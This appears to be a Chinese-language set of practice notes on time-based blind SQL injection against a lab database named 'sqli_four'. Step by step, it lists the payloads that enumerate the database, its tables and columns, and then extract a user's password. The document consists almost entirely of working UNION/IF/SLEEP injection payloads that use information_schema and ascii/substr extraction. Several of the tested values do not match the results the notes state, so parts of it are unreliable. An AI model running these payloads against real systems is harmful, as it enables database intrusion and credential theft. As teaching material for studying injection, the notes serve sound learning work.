延迟注入

猜数据库长度：9位

union select if(length(database())=9, sleep(3), 0), 2;--

猜数据库名：sqli_four

UNION SELECT IF(database()="sqli_four", SLEEP(3), 0), 2;--

猜数据库表数量：2

UNION SELECT IF((select count(table_name) from information_schema.tables where table_schema = database())=2, SLEEP(3), 0), 2;--

猜测表名长度： 表一：19位 表2：5位

UNION SELECT IF(length((select table_name from information_schema.tables where table_schema='sqli_four' limit 0,1))=8, SLEEP(3), 0), 2;--

猜表2表名：users

UNION SELECT IF(ascii(substr((select table_name from information_schema.tables where table_schema='sqli_four' limit 1,1),1,1))=101, SLEEP(3), 0), 2;--

猜第一列长度：2

UNION SELECT if(length((select column_name from information_schema.columns where table_schema='sqli_four' and table_name='users' limit 0,1))=2, sleep(3), 0), 2;--

猜第一列名：id

UNION SELECT if((select column_name from information_schema.columns where table_schema='sqli_four' and table_name='users' limit 0,1)="id", sleep(3), 0), 2;--

猜第二列长度：8

UNION SELECT if(length((select column_name from information_schema.columns where table_schema='sqli_four' and table_name='users' limit 1,1))=2, sleep(3), 0), 2;--

猜第二列名：password

UNION SELECT if((select column_name from information_schema.columns where table_schema='sqli_four' and table_name='users' limit 1,1)="password", sleep(3), 0), 2;--

查询有几个记录：1条

union select if((select count(id) from users)=1,sleep(3), 0), 2;--

查询第一个id长度：1

union select if(length((select id from sqli_four.users limit 0,1))=5, sleep(3), 0), 2;--

查询第一个id值：1

union select if((select id from sqli_four.users limit 0,1)=1, sleep(3), 0), 2;--

查询id=1的密码长度：4

union select if(length((select password from sqli_four.users limit 0,1))=4, sleep(3), 0), 2;--

查询id=1的密码值：4961

union select if(ascii(substr((select password from sqli_four.users limit 0,1),1,1))=101, sleep(3), 0), 2;--